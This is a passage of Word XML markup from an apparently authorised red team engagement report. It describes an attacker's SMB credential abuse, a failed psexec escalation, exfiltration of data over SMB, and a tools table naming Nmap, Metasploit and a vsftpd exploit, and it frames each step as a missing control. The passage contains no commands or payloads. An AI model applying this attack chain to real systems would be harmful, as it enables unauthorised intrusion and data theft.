    <w:p w14:paraId="086B2C89" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Upon gaining access, the attacker was free to run commands on the compromised system. This means that there are no endpoint detection and response (EDR) solutions, which are used to track and analyse suspicious behaviour on the host level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12984243" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:t>The system did not have a logging and auditing system that could identify abnormal execution of commands or abuse of privileges. Malicious scripts like shell access and command execution could go unnoticed without adequate endpoint visibility (Shackleford, 2020).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632CA8B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc228059732"/>
      <w:bookmarkStart w:id="108" w:name="_Toc228127149"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>6.4 Internal Access and Credential Abuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="15913E45" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attacker was able to authenticate to the Windows system with valid credentials and gain access to shared resources using SMB. This points to a serious vulnerability of authentication and access control systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E95A4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The system lacked rigorous password controls or multi-factor authentication (MFA), and it could be easily accessed with the use of credentials. Additionally, no tracking of the logins and unusual authentication behaviour was done that would have detected suspicious access by an external system (Behl and Behl, 2017).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F6D60" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">The unsuccessful privilege escalation attempt that relied on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> module means that the privilege separation worked to some extent. But the capability of authenticating and enumerating administrative shares still poses a serious threat to lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63C993" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc228059733"/>
      <w:bookmarkStart w:id="110" w:name="_Toc228127150"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>6.5 Data Exfiltration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="3E3901BE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The last phase of the attack entailed exfiltration of sensitive data through SMB file transfer. This action went unnoticed because of the lack of data loss prevention (DLP) policies and monitoring of network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C049AE2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>No measures were taken to check outgoing data transfers or abnormal file access patterns. In practice, in the real world, there would be monitoring and analysis of large or unauthorised transfers of data. Such controls were not in place, and this enabled the attacker to steal sensitive information without any alarms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B6A72B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc228059734"/>
      <w:bookmarkStart w:id="112" w:name="_Toc228127151"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7. Tools and Techniques Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="4537F902" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The table below provides an overview of the major tools and techniques that were utilised in the red team engagement (Nmap Project, 2023).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2042"/>
        <w:gridCol w:w="2663"/>
        <w:gridCol w:w="4925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="224A9995" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F589A25" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool / Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551E3DCE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0435E2CE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application in This Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="638CD9C2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F2AB11" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52997F05" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Network scanning and enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AAC678" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t xml:space="preserve">Identified active hosts, open ports, and vulnerable services (e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>, SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="4D7C3947" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D8AE475" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="446B3572" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exploitation and post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEE2131" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t xml:space="preserve">Exploited </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t xml:space="preserve"> vulnerability and attempted SMB-based privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="0D31D4FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AE48E3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>smbclient</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062EFC1E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>SMB interaction and file access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="538AC198" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Authenticated to Windows system, enumerated shares, and downloaded sensitive data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="0709F0DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BC4AF8C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="538F6C31" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Attack platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="403687F1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Used as the primary environment for executing all attack activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="35F1A1FF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2369E644" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Service Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B376FA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Information gathering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE8181A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Discovered services and potential attack vectors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="7C80E8D3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11E0738E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ABDBFBD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Gaining system access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C71957F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exploited vulnerable services to obtain initial access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="5F1E00C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7870CFA0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:lastRenderedPageBreak/>
              <w:t>Credential-Based Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ADA1966" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Authentication using valid credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0D23AA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Accessed internal system via SMB using weak credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="71704F44" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
